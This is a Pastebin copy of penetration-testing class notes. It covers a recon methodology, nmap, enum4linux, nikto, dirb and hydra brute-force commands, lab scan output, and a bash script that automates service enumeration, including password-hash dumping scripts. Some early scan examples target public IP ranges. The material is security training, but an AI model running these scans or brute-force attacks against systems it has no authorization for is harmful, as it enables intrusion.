joemccray

Ultimate Hacklab May 2018

May 5th, 2018
2,098
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 49.67 KB | None | 0 0
  1. The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
  2.  
  3.  
  4. Issue 1. Lack of a thorough attack process
  5. ==========================================
  6. - Host discovery
  7. - Service discovery
  8. - Service version discovery
  9. - Vulnerability research
  10. - Linux (port 111)/Window (port 445) Enumeration
  11. - Webserver vulnerability scan
  12. - Directory brute force every webserver
  13. - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
  14. - Brute force all services
  15.  
  16.  
  17. Issue 2. Lack of automation of the process
  18. ==========================================
  19. - Research attacks scripts on the internet to enhance your methodology
  20.  
  21.  
  22. Issue 3. Failing to document all steps being performed and their output
  23. =======================================================================
  24.  
  25.  
  26. Issue 4. Lack of sleep during the exam
  27. ======================================
  28.  
  29.  
  30. Issue 5. Failing to reboot target machines prior to attack
  31. ==========================================================
  32.  
  33.  
  34.  
  35. --------------------------------------------------------------------------------------------------------------
  36.  
  37.  
  38. A good strategy to use to prepare would be:
  39.  
  40. Step 1. Ensure that you are comfortable with Linux
  41. --------------------------------------------------
  42. - LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
  43. - Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
  44.  
  45. You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
  46. https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
  47. https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
  48. https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
  49.  
  50.  
  51.  
  52. 2. You should be comfortable with the following tools:
  53. ------------------------------------------------------
  54.  
  55. Nmap:
  56. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
  57.  
  58. Metasploit:
  59. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
  60.  
  61. Burp Suite:
  62. https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
  63.  
  64. Sqlmap:
  65. https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
  66.  
  67. Nikto:
  68. https://www.youtube.com/watch?v=GH9qn_DBzCk
  69.  
  70. Enum4Linux:
  71. https://www.youtube.com/watch?v=hA5raaGOQKQ
  72.  
  73. RPCINFO/SHOWMOUNT:
  74. https://www.youtube.com/watch?v=FlRAA-1UXWQ
  75.  
  76. Hydra:
  77. https://www.youtube.com/watch?v=rLtj8tEmGso
  78.  
  79.  
  80.  
  81. 3. You need to comfortable with basic exploit development
  82. ---------------------------------------------------------
  83.  
  84. Basic assembly:
  85. https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
  86.  
  87. Basic exploit development (first 5 videos in the playlist):
  88. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  89.  
  90.  
  91. 4. You need to be comfortable with privilege escalation
  92. -------------------------------------------------------
  93. Linux
  94. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  95.  
  96. Windows
  97. https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
  98. http://www.fuzzysecurity.com/tutorials/16.html
  99.  
  100.  
  101.  
  102.  
  103. #################################
  104. ----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
  105. #################################
  106.  
  107.  
  108. ########################
  109. # Scanning Methodology #
  110. ########################
  111.  
  112. - Ping Sweep
  113. What's alive?
  114. ------------
  115.  
  116. ---------------------------Type This-----------------------------------
  117. sudo nmap -sP 157.166.226.*
  118.  
  119. -----------------------------------------------------------------------
  120.  
  121.  
  122.  
  123. -if -SP yields no results try:
  124. ---------------------------Type This-----------------------------------
  125. sudo nmap -sL 157.166.226.*
  126.  
  127. -----------------------------------------------------------------------
  128.  
  129.  
  130.  
  131. -Look for hostnames:
  132. ---------------------------Type This-----------------------------------
  133. sudo nmap -sL 157.166.226.* | grep com
  134.  
  135. -----------------------------------------------------------------------
  136.  
  137.  
  138.  
  139. - Port Scan
  140. What's where?
  141. ------------
  142. ---------------------------Type This-----------------------------------
  143. sudo nmap -sS 162.243.126.247
  144.  
  145. -----------------------------------------------------------------------
  146.  
  147.  
  148.  
  149. - Bannergrab/Version Query
  150. What versions of software are running
  151. -------------------------------------
  152.  
  153. ---------------------------Type This-----------------------------------
  154. sudo nmap -sV 162.243.126.247
  155.  
  156. -----------------------------------------------------------------------
  157.  
  158.  
  159.  
  160.  
  161. - Vulnerability Research
  162. Lookup the banner versions for public exploits
  163. ----------------------------------------------
  164. http://exploit-db.com
  165. http://securityfocus.com/bid
  166. https://packetstormsecurity.com/files/tags/exploit/
  167.  
  168.  
  169.  
  170.  
  171.  
  172. -----------------------------------------------------------------------------------------------------------------------------
  173. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  174. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  175. --------------------------------------------------------------------------------------
  176. Some tools to install:
  177. ---------------------------Type This-----------------------------------
  178. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  179. gcc propecia.c -o propecia
  180. sudo cp propecia /bin
  181. -----------------------------------------------------------------------
  182.  
  183.  
  184.  
  185.  
  186. ##############################
  187. # Scanning Process to follow #
  188. ##############################
  189.  
  190. Step 1: Host Discovery
  191. ----------------------
  192.  
  193. ---------------------------Type This-----------------------------------
  194. nmap -sP 172.31.2.0/24
  195.  
  196. nmap -sL 172.31.2.0/24
  197.  
  198. nmap -sS --open -p 22,445 172.31.2.0/24
  199.  
  200. propecia 172.31.2 22 > file1
  201. propecia 172.31.2 445 > file2
  202. cat file1 file2 > file3
  203. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
  204. cat lab.txt
  205. -----------------------------------------------------------------------
  206.  
  207.  
  208. Step 2: Port Scan
  209. -----------------
  210. nmap -sS <IP-ADDRESS>
  211. nmap -sU -p 69,161 <IP-ADDRESS>
  212.  
  213.  
  214. ---------------------------Type This-----------------------------------
  215. sudo nmap -sS 172.31.2.0/24
  216. sudo nmap -sU -p 69,161 172.31.2.0/24
  217. -----------------------------------------------------------------------
  218.  
  219.  
  220. Step 3: Bannergrab
  221. ------------------
  222. nmap -sV <IP-ADDRESS>
  223. nmap -sV -p- <IP-ADDRESS>
  224. |
  225. ----> Vulnerability Research
  226.  
  227. ---------------------------Type This-----------------------------------
  228. sudo nmap -sV 172.31.2.0/24
  229. -----------------------------------------------------------------------
  230.  
  231.  
  232.  
  233.  
  234. Step 4: Enumerate common Windows/Linux file sharing services
  235. Step 3 is where most people STOP, and you need to move on and look deeper
  236. ------------------------------------------------------------
  237.  
  238. ---------------------------Type This-----------------------------------
  239. sudo apt install smbclient libnss-winbind winbind
  240. git clone https://github.com/portcullislabs/enum4linux.git
  241. cd enum4linux/
  242. perl enum4linux.pl -U 172.31.2.11
  243.  
  244. nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
  245. ---------------------------------------------------------------------------------------
  246.  
  247.  
  248.  
  249. Step 5: Vulnerability Scan the webservers
  250. -----------------------------------------
  251. git clone https://github.com/sullo/nikto.git Nikto2
  252.  
  253. cd Nikto2/program
  254.  
  255. perl nikto.pl -h <IP-ADDRESS>
  256.  
  257.  
  258.  
  259. Step 6: Directory Bruteforce every webserver
  260. --------------------------------------------
  261. sudo apt install -y libcurl4-openssl-dev
  262.  
  263. git clone https://github.com/v0re/dirb.git
  264.  
  265. cd dirb/
  266.  
  267. ./configure
  268.  
  269. make
  270.  
  271. ./dirb
  272.  
  273. ./dirb http://<IP-ADDRESS> wordlists/big.txt
  274.  
  275.  
  276.  
  277.  
  278.  
  279. Step 7: Analyze source code of all webpages found
  280. -------------------------------------------------
  281. lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
  282.  
  283. If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
  284.  
  285. $ wget \
  286. --recursive \
  287. --no-clobber \
  288. --page-requisites \
  289. --html-extension \
  290. --convert-links \
  291. --restrict-file-names=windows \
  292. --domains website.org \
  293. --no-parent \
  294. www.website.org/tutorials/html/
  295.  
  296.  
  297. This command downloads the Web site www.website.org/tutorials/html/.
  298.  
  299. The options are:
  300.  
  301. --recursive: download the entire Web site.
  302.  
  303. --domains website.org: don't follow links outside website.org.
  304.  
  305. --no-parent: don't follow links outside the directory tutorials/html/.
  306.  
  307. --page-requisites: get all the elements that compose the page (images, CSS and so on).
  308.  
  309. --html-extension: save files with the .html extension.
  310.  
  311. --convert-links: convert links so that they work locally, off-line.
  312.  
  313. --restrict-file-names=windows: modify filenames so that they will work in Windows as well.
  314.  
  315. --no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
  316.  
  317.  
  318.  
  319. Step 8: Bruteforce any services you find
  320. ----------------------------------------
  321. sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-devcd ~/toolz
  322. git clone https://github.com/vanhauser-thc/thc-hydra.git
  323. cd thc-hydra
  324. ./configure
  325. make
  326. hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
  327. hydra -l user -P passlist.txt ftp://<IP-ADDRESS
  328.  
  329.  
  330.  
  331. ##################
  332. # Host Discovery #
  333. ##################
  334.  
  335. Reason:
  336. -------
  337. You have to discover the reachable hosts in the network before you can attack them.
  338.  
  339.  
  340. Hosts discovery syntax:
  341. -----------------------
  342. nmap -sP 172.31.2.0/24
  343. propecia 172.31.2 22 > file1
  344. propecia 172.31.2 445 > file2
  345. cat file1 file2 > file3
  346. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
  347. cat lab.txt
  348.  
  349. Issues:
  350. -------
  351. Issue we had to deal with was hosts that didn't respond to ICMP
  352.  
  353.  
  354. Hosts discovered:
  355. -----------------
  356. 172.31.2.11
  357. 172.31.2.14
  358. 172.31.2.47
  359. 172.31.2.64
  360. 172.31.2.86
  361. 172.31.2.117
  362. 172.31.2.157
  363. 172.31.2.217
  364. 172.31.2.238
  365.  
  366.  
  367.  
  368.  
  369.  
  370.  
  371. #####################
  372. # Service Discovery #
  373. #####################
  374.  
  375. Reason:
  376. -------
  377. Identifying what services are running on what hosts allows for you to map the network topology.
  378.  
  379.  
  380.  
  381. Port Scan syntax:
  382. sudo nmap -sS -Pn -iL lab.txt
  383. sudo nmap -sU -p69,161 -Pn -iL lab.txt
  384.  
  385.  
  386.  
  387. Services discovered:
  388. --------------------
  389.  
  390. joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
  391.  
  392. Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
  393. Nmap scan report for 172.31.2.11
  394. Host is up (0.087s latency).
  395. Not shown: 995 filtered ports
  396. PORT STATE SERVICE
  397. 21/tcp open ftp
  398. 139/tcp open netbios-ssn
  399. 445/tcp open microsoft-ds
  400. 3389/tcp open ms-wbt-server
  401. 9999/tcp open abyss
  402.  
  403. Nmap scan report for 172.31.2.11
  404. Host is up.
  405.  
  406. PORT STATE SERVICE
  407. 69/udp open|filtered tftp
  408. 161/udp open|filtered snmp
  409.  
  410.  
  411. Nmap scan report for 172.31.2.14
  412. Host is up (0.087s latency).
  413. Not shown: 995 filtered ports
  414. PORT STATE SERVICE
  415. 21/tcp open ftp
  416. 139/tcp open netbios-ssn
  417. 445/tcp open microsoft-ds
  418. 3389/tcp open ms-wbt-server
  419. 9999/tcp open abyss
  420.  
  421.  
  422. Nmap scan report for 172.31.2.14
  423. Host is up.
  424.  
  425. PORT STATE SERVICE
  426. 69/udp open|filtered tftp
  427. 161/udp open|filtered snmp
  428.  
  429.  
  430. Nmap scan report for 172.31.2.47
  431. Host is up (0.086s latency).
  432. Not shown: 998 closed ports
  433. PORT STATE SERVICE
  434. 22/tcp open ssh
  435. 80/tcp open http
  436.  
  437. Nmap scan report for 172.31.2.64
  438. Host is up (0.087s latency).
  439. Not shown: 997 closed ports
  440. PORT STATE SERVICE
  441. 22/tcp open ssh
  442. 80/tcp open http
  443. 6667/tcp open irc
  444.  
  445. Nmap scan report for 172.31.2.86
  446. Host is up (0.086s latency).
  447. Not shown: 989 closed ports
  448. PORT STATE SERVICE
  449. 22/tcp open ssh
  450. 53/tcp open domain
  451. 80/tcp open http
  452. 110/tcp open pop3
  453. 111/tcp open rpcbind
  454. 139/tcp open netbios-ssn
  455. 143/tcp open imap
  456. 445/tcp open microsoft-ds
  457. 993/tcp open imaps
  458. 995/tcp open pop3s
  459. 8080/tcp open http-proxy
  460.  
  461. Nmap scan report for 172.31.2.117
  462. Host is up (0.087s latency).
  463. Not shown: 997 closed ports
  464. PORT STATE SERVICE
  465. 22/tcp open ssh
  466. 80/tcp open http
  467. 2020/tcp open xinupageserver
  468.  
  469. Nmap scan report for 172.31.2.157
  470. Host is up (0.087s latency).
  471. Not shown: 997 closed ports
  472. PORT STATE SERVICE
  473. 21/tcp open ftp
  474. 22/tcp open ssh
  475. 80/tcp open http
  476.  
  477. Nmap scan report for 172.31.2.217
  478. Host is up (0.087s latency).
  479. Not shown: 997 closed ports
  480. PORT STATE SERVICE
  481. 22/tcp open ssh
  482. 80/tcp open http
  483. 3260/tcp open iscsi
  484.  
  485. Nmap scan report for 172.31.2.238
  486. Host is up (0.087s latency).
  487. Not shown: 997 closed ports
  488. PORT STATE SERVICE
  489. 22/tcp open ssh
  490. 80/tcp open http
  491. 6969/tcp open acmsoda
  492.  
  493. Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
  494.  
  495.  
  496.  
  497.  
  498.  
  499.  
  500.  
  501.  
  502.  
  503. ##############################################
  504. # Service Version Discovery (Bannergrabbing) #
  505. ##############################################
  506. Reason:
  507. -------
  508. Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
  509.  
  510.  
  511.  
  512. Port Scan syntax:
  513.  
  514. joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
  515.  
  516. Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
  517. Nmap scan report for 172.31.2.11
  518. Host is up (0.087s latency).
  519. Not shown: 995 filtered ports
  520. PORT STATE SERVICE VERSION
  521. 21/tcp open ftp FreeFloat ftpd 1.00
  522. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  523. 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
  524. 3389/tcp open ms-wbt-server Microsoft Terminal Service
  525. 9999/tcp open abyss?
  526. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
  527.  
  528. Nmap scan report for 172.31.2.14
  529. Host is up (0.087s latency).
  530. Not shown: 995 filtered ports
  531. PORT STATE SERVICE VERSION
  532. 21/tcp open ftp FreeFloat ftpd 1.00
  533. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  534. 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
  535. 3389/tcp open ms-wbt-server Microsoft Terminal Service
  536. 9999/tcp open abyss?
  537. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
  538.  
  539. Nmap scan report for 172.31.2.47
  540. Host is up (0.087s latency).
  541. Not shown: 998 closed ports
  542. PORT STATE SERVICE VERSION
  543. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
  544. 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
  545. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  546.  
  547. Nmap scan report for 172.31.2.64
  548. Host is up (0.087s latency).
  549. Not shown: 997 closed ports
  550. PORT STATE SERVICE VERSION
  551. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  552. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  553. 6667/tcp open irc ngircd
  554. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  555.  
  556. Nmap scan report for 172.31.2.86
  557. Host is up (0.087s latency).
  558. Not shown: 989 closed ports
  559. PORT STATE SERVICE VERSION
  560. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  561. 53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
  562. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  563. 110/tcp open pop3 Dovecot pop3d
  564. 111/tcp open rpcbind 2-4 (RPC #100000)
  565. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  566. 143/tcp open imap Dovecot imapd (Ubuntu)
  567. 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  568. 993/tcp open ssl/imap Dovecot imapd (Ubuntu)
  569. 995/tcp open ssl/pop3 Dovecot pop3d
  570. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  571. Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
  572.  
  573. Nmap scan report for 172.31.2.117
  574. Host is up (0.086s latency).
  575. Not shown: 997 closed ports
  576. PORT STATE SERVICE VERSION
  577. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  578. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  579. 2020/tcp open ftp vsftpd 2.0.8 or later
  580. Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  581.  
  582. Nmap scan report for 172.31.2.157
  583. Host is up (0.086s latency).
  584. Not shown: 997 closed ports
  585. PORT STATE SERVICE VERSION
  586. 21/tcp open ftp vsftpd 2.0.8 or later
  587. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
  588. 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
  589.  
  590. Nmap scan report for 172.31.2.217
  591. Host is up (0.087s latency).
  592. Not shown: 997 closed ports
  593. PORT STATE SERVICE VERSION
  594. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
  595. 80/tcp open http nginx
  596. 3260/tcp open iscsi?
  597. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  598.  
  599. Nmap scan report for 172.31.2.238
  600. Host is up (0.087s latency).
  601. Not shown: 997 closed ports
  602. PORT STATE SERVICE VERSION
  603. 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  604. 80/tcp open http nginx 1.6.2
  605. 6969/tcp open acmsoda?
  606. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  607.  
  608. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  609. Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
  610.  
  611.  
  612.  
  613.  
  614.  
  615.  
  616.  
  617. -----------------------------------------------------------------------------------------------------------------------------
  618. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  619. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  620. --------------------------------------------------------------------------------------
  621.  
  622. #!/bin/bash
  623.  
  624. # Script made during the CyberWar class for the students to play with, debug, and improve.
  625. # Take a look at the following websites for ideas:
  626. # https://github.com/commonexploits/port-scan-automation
  627. # https://www.commonexploits.com/penetration-testing-scripts/
  628. # https://github.com/averagesecurityguy/scripts
  629. # https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  630.  
  631.  
  632.  
  633. # Some thoughts of things to add to this script:
  634. # Shodan queries (API key)
  635. # AWS scanning (need credentials)
  636. # Jenkins scanning
  637. # Active Directory enumeration
  638. # Github scanning (API key required)
  639. # Blockchain platforms
  640.  
  641.  
  642.  
  643.  
  644.  
  645.  
  646.  
  647. #############################################
  648. # Check to see if script is running as root #
  649. #############################################
  650. if [ "$EUID" -ne 0 ]
  651. then echo "Please run as root"
  652. exit
  653. fi
  654.  
  655.  
  656. ####################################
  657. # Check to see if gcc is installed #
  658. ####################################
  659. file1="/usr/bin/gcc"
  660. if [ -f "$file1" ]
  661. then
  662. echo "$file is installed."
  663. clear
  664. else
  665. echo "$file not found."
  666. echo Installing gcc
  667. apt-get install -y gcc
  668. clear
  669. fi
  670.  
  671. ########################
  672. # Make the directories #
  673. ########################
  674. cd /tmp
  675. rm -rf customerAudit/
  676. rm -rf NetworkAudit/
  677. mkdir -p /tmp/NetworkAudit/discovered_services/
  678. mkdir -p /tmp/NetworkAudit/scan/windows/
  679. mkdir -p /tmp/NetworkAudit/scan/sunrpc/
  680. mkdir -p /tmp/NetworkAudit/scan/ssh/
  681. mkdir -p /tmp/NetworkAudit/scan/ftp/
  682. mkdir -p /tmp/NetworkAudit/scan/http/
  683. mkdir -p /tmp/NetworkAudit/scan/telnet/
  684. mkdir -p /tmp/NetworkAudit/scan/pop3/
  685. mkdir -p /tmp/NetworkAudit/scan/printers/
  686. mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
  687. mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
  688. mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
  689. mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
  690.  
  691.  
  692. #####################
  693. # Download propecia #
  694. #####################
  695. file2="/bin/propecia"
  696. if [ -f "$file2" ]
  697. then
  698. echo "$file is installed."
  699. clear
  700. else
  701. echo "$file not found."
  702. echo Installing propecia
  703. cd /tmp
  704. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  705. gcc propecia.c -o propecia
  706. cp propecia /bin
  707. fi
  708.  
  709. ######################
  710. # Find Windows Hosts #
  711. ######################
  712. clear
  713. echo "Scanning for windows hosts."
  714. propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
  715. clear
  716. echo "Done scanning for windows hosts. FTP is next."
  717.  
  718.  
  719. ##################
  720. # Find FTP Hosts #
  721. ##################
  722. echo "Scanning for hosts running FTP."
  723. propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
  724. clear
  725. echo "Done scanning for FTP hosts. SSH is next."
  726.  
  727. ##################
  728. # Find SSH Hosts #
  729. ##################
  730. echo "Scanning for hosts running SSH."
  731. propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
  732. clear
  733. echo "Done scanning for SSH hosts. POP3 is next."
  734.  
  735.  
  736. ###################
  737. # Find POP3 Hosts #
  738. ###################
  739. echo "Scanning for hosts running POP3."
  740. propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
  741. clear
  742. echo "Done scanning for POP3 hosts. SunRPC is next."
  743.  
  744.  
  745. #####################
  746. # Find SunRPC Hosts #
  747. #####################
  748. echo "Scanning for hosts running SunRPC."
  749. propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
  750. clear
  751. echo "Done scanning for SunRPC hosts. Telnet is next."
  752.  
  753.  
  754. #####################
  755. # Find Telnet Hosts #
  756. #####################
  757. echo "Scanning for hosts running Telnet."
  758. propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
  759. clear
  760. echo "Done scanning for Telnet hosts. HTTP is next."
  761.  
  762.  
  763. ###################
  764. # Find HTTP Hosts #
  765. ###################
  766. echo "Scanning for hosts running HTTP"
  767. propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
  768. clear
  769. echo "Done scanning for HTTP hosts. HTTPS hosts are next."
  770.  
  771.  
  772. ###################
  773. # Find HTTPS Hosts #
  774. ###################
  775. echo "Scanning for hosts running HTTP"
  776. propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
  777. clear
  778. echo "Done scanning for HTTPS hosts. Databases are next."
  779.  
  780.  
  781. ##################
  782. # Find Databases #
  783. ##################
  784. echo "Scanning for hosts running MS SQL Server"
  785. propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
  786. clear
  787.  
  788. echo "Scanning for hosts running Oracle"
  789. propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
  790. clear
  791.  
  792. echo "Scanning for hosts running Postgres"
  793. propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
  794. clear
  795.  
  796. echo "Scanning for hosts running MongoDB"
  797. propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
  798. clear
  799.  
  800. echo "Scanning for hosts running MySQL"
  801. propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
  802. clear
  803. echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
  804.  
  805.  
  806. ###############################
  807. # Ok, let's do the NMAP files #
  808. ###############################
  809. clear
  810. # Windows
  811. for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
  812. echo "Done with Windows."
  813.  
  814. clear
  815. # FTP
  816. for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
  817. echo "Done with FTP."
  818.  
  819. clear
  820. # SSH
  821. for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
  822. echo "Done with SSH."
  823.  
  824. clear
  825. # SUNRPC
  826. for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
  827. echo "Done with SunRPC."
  828.  
  829. clear
  830. # POP3
  831. for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
  832. echo "Done with POP3."
  833.  
  834. # clear
  835. # HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  836. # as a good reference for what nmap nse scripts to run against port 80 and 443
  837. # for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
  838. # echo "Done with HTTP."
  839.  
  840.  
  841. # clear
  842. # HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  843. # as a good reference for what nmap nse scripts to run against port 80 and 443
  844. # for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
  845. # echo "Done with HTTP."
  846.  
  847.  
  848. clear
  849. # SQL Servers
  850. for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
  851. echo "Done with MS SQL."
  852.  
  853. clear
  854. # Oracle Servers
  855. # FIX THIS: needs brute force wordlists for this to run correctly
  856. # for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
  857. # echo "Done with Oracle."
  858.  
  859. clear
  860. # MongoDB
  861. for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
  862. echo "Done with MongoDB."
  863.  
  864.  
  865. clear
  866. # MySQL Servers
  867. for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
  868. echo "Done with MySQL."
  869.  
  870.  
  871. # Add postgres nse scripts
  872. # References:
  873. # https://nmap.org/nsedoc/lib/pgsql.html
  874. # https://nmap.org/nsedoc/scripts/pgsql-brute.html
  875. #
  876.  
  877. echo " "
